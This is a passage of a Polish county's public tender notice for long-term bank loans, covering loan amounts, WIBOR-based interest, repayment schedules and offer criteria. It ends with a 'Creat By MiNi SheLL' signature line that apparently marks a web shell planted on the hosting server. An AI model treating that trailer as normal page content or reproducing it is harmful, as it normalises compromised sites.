31 stycznia 2018 roku z rachunku budżetu Powiatu nr 34 1020 4144 0000 6902 0007 0086b)	Początek spłaty odsetek od kredytu od 31 stycznia 2018 oku z rachunku wydatków nr 69 1020 4027 0000 1002 1315 2485c)	Termin płatności rat kredytowych i odsetek od kredytu przypadający na ostatni dzień roboczy każdego miesiąca - raty płatne miesięcznied)	Wykonawca zobowiązany jest do informowania Zamawiającego o wysokości rat i odsetek miesięcznych do zapłaty w terminie do 22 każdego miesiąca.9.	Dopuszcza się możliwość spłaty kredytu przed ustalonym terminem bez ponoszenia dodatkowych opłat i prowizji ( odsetki naliczane do dnia spłaty kredytu, a nie do końca okresu umowy, bez prowizji rekompensacyjnej).10.	Zabezpieczenie kredytu stanowi weksel in blanco z wystawienia Zamawiającego wraz z deklaracją wekslową.11.	Umowa oraz weksel in blanco zostaną kontrasygnowane przez Skarbnika Powiatu.12.	Na potrzeby obliczenia odsetek od kredytu w umowie oraz na potrzeby obliczenia ceny ofert należy przyjąć kalendarz rzeczywisty tj. liczący 365/366 dni w roku przestępnym.13.	Koszty obsługi kredytu ( cenę ofertową) stanowią : oprocentowanie kredytu oraz marża.14.	Oprocentowanie kredytu dla obliczenia ceny oferty powinno być wyliczone w oparciu o stawkę bazową WIBOR 1M w wysokości obowiązującej na dzień 02.05.2017 roku15.	Wykonawca jest obowiązany do skalkulowania i podania w ofercie wyłącznie dwóch stawek w następujący sposób:o	Oprocentowanie kredytu w stosunku do stopy procentowej WIBOR 1M (wg stawki obowiązującej na dzień 02.05.2017 roku ogłoszonej w Rzeczpospolitej w dniu 02.05.2017 roku.o	Marża (w całym okresie kredytowania).16.	Kredyt nie może być obciążony innymi opłatami niż marża bankowa określona w ofercie Wykonawcy.17.	Do złożonej oferty Wykonawca załączy projekt umowy o udzielenie kredytu spełniający wyżej wymienione warunki udzielenia zamówienia.18.	Zamawiający dopuszcza możliwość zmniejszenia wysokości udzielonego kredytu w zależności od wyniku postępowania przetargowego na inwestycje Powiatu finansowane z kredytu.19.	Zamawiający zastrzega sobie możliwość zmiany spłaty kapitału i odsetek od zaciągniętego kredytu w ratach i terminach innych niż określono w harmonogramie ze względu na pogorszenie sytuacji ekonomiczno-finansowej.20.	W celu wstępnego zbadania zdolności kredytowej Zamawiającego, Zamawiający udostępni dokumenty formalno-prawne oraz dokumenty dotyczące sytuacji ekonomiczno-finansowej Zamawiającego w Biuletynie Informacji Publicznej na stronie Powiatu Nowotomyskiego.21.	Rozliczenia między Zamawiającym a Wykonawcą prowadzone będą w PLN.22. Zamawiający dopuszcza możliwość zmniejszenia wysokości udzielonego kredytu bez ponoszenia dodatkowych prowizji i opłat bez konieczności uzyskiwania zgody banku w zależności od wyniku postępowania przetargowego na inwestycje Powiatu finansowane z kredytu.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>66113000-5, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2027-12-28<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">CENA</td><td style="border: 1px solid black;border-collapse: collapse;">95,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">czas uruchomienia kredytu</td><td style="border: 1px solid black;border-collapse: collapse;">5,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>ZADANIE NR 2</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Przedmiotem zamówienia jest udzielenie i obsługa długoterminowego kredytu złotowego dla Powiatu Nowotomyskiego w wysokości 2.631.561zł na okres 10 lat z przeznaczeniem na spłatę wcześniej zaciągniętych zobowiązań Powiatu z tytułu kredytów na podstawie Uchwały Nr XXVII/187/2017 Rady Powiatu Nowotomyskiego z dnia 15 lutego 2017r.2.	Kredyt w walucie polskiej.3.	Oprocentowanie zmienne, oparte na stawce WIBOR1M + stała marża bankowa ( Zamawiający zastrzega możliwość zmiany marży Banku poprzez jej obniżenie na wniosek Zamawiającego do poziomu oferowanego dla nowych kredytów udzielanych jednostkom samorządu terytorialnego).4.	Okres spłaty od stycznia 2018 roku do 28 grudnia 2027 roku w okresach miesięcznych.5.	Wykonawca zobowiązany jest stawić do dyspozycji Zamawiającego kredyt w formie przelewu środków finansowych z rachunku kredytowego Wykonawcy na rachunek budżetu Powiatu nr 34 1020 4144 0000 6902 0007 0086. ( w formie polecenia przelewu).6.	Wykorzystanie kredytu nastąpi jednorazowo lub w ratach na podstawie dyspozycji Zamawiającego.7.	Kwota kredytu zostanie postawiona do dyspozycji Zamawiającego w okresie od 01 lipca 2017 roku do 31 grudnia 2017 w wysokości określonej na podstawie dyspozycji Zamawiającego ( w przypadku, gdy procedura przetargowa nie zostanie zakończona do 01.07.2017r., termin postawienia kredytu do dyspozycji ulegnie przesunięciu).8.	Zamawiający zobowiązuje się do spłaty kapitału i odsetek w następującej formie:a)	Początek spłaty kapitału od 31 stycznia 2018 roku z rachunku budżetu Powiatu nr 34 1020 4144 0000 6902 0007 0086b)	Początek spłaty odsetek od kredytu od 31 stycznia 2018 oku z rachunku wydatków nr 69 1020 4027 0000 1002 1315 2485c)	Termin płatności rat kredytowych i odsetek od kredytu przypadający na ostatni dzień każdego miesiąca - raty płatne miesięcznied)	Wykonawca zobowiązany jest do informowania Zamawiającego o wysokości rat i odsetek miesięcznych do zapłaty w terminie do 22 każdego miesiąca.9.	Dopuszcza się możliwość spłaty kredytu przed ustalonym terminem bez ponoszenia dodatkowych opłat i prowizji ( odsetki naliczane do dnia spłaty kredytu a nie do końca okresu umowy, bez prowizji rekompensacyjnej).10.	Zabezpieczenie kredytu stanowi weksel in blanco z wystawienia Zamawiającego wraz z deklaracją wekslową.11.	Umowa oraz weksel in blanco zostaną kontrasygnowane przez Skarbnika Powiatu.12.	Na potrzeby obliczenia odsetek od kredytu w umowie oraz na potrzeby obliczenia ceny ofert należy przyjąć kalendarz rzeczywisty tj. liczący 365/366 dni w roku przestępnym.13.	Koszty obsługi kredytu ( cenę ofertową) stanowią : oprocentowanie kredytu oraz marża.14.	Oprocentowanie kredytu dla obliczenia ceny oferty powinno być wyliczone w oparciu o stawkę bazową WIBOR 1M w wysokości obowiązującej na dzień 02.05.2017 roku.15.	Wykonawca jest obowiązany do skalkulowania i podania w ofercie wyłącznie dwóch stawek w następujący sposób:o	Oprocentowanie kredytu w stosunku do stopy procentowej WIBOR 1M (wg stawki obowiązującej na dzień 02.05.2017 roku ogłoszonej w Rzeczpospolitej z dnia 02.05.2017 roku.o	Marża (w całym okresie kredytowania)16.	Kredyt nie może być obciążony innymi opłatami niż marża bankowa określona w ofercie Wykonawcy.17.	Do złożonej oferty Wykonawca załączy projekt umowy o udzielenie kredytu spełniający wyżej wymienione warunki udzielenia zamówienia.18.	Zamawiający zastrzega sobie możliwość zmiany spłaty kapitału i odsetek od zaciągniętego kredytu w ratach i terminach innych niż określono w harmonogramie ze względu na pogorszenie sytuacji ekonomiczno-finansowej.19.	W celu wstępnego zbadania zdolności kredytowej Zamawiającego, Zamawiający udostępni dokumenty formalno-prawne oraz dokumenty dotyczące sytuacji ekonomiczno-finansowej Zamawiającego w Biuletynie Informacji Publicznej na stronie Powiatu Nowotomyskiego.20.	Rozliczenia między Zamawiającym a Wykonawcą prowadzone będą w PLN.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>66113000-5, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2027-12-28<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">CENA</td><td style="border: 1px solid black;border-collapse: collapse;">95,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">czas uruchomienia kredytu</td><td style="border: 1px solid black;border-collapse: collapse;">5,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com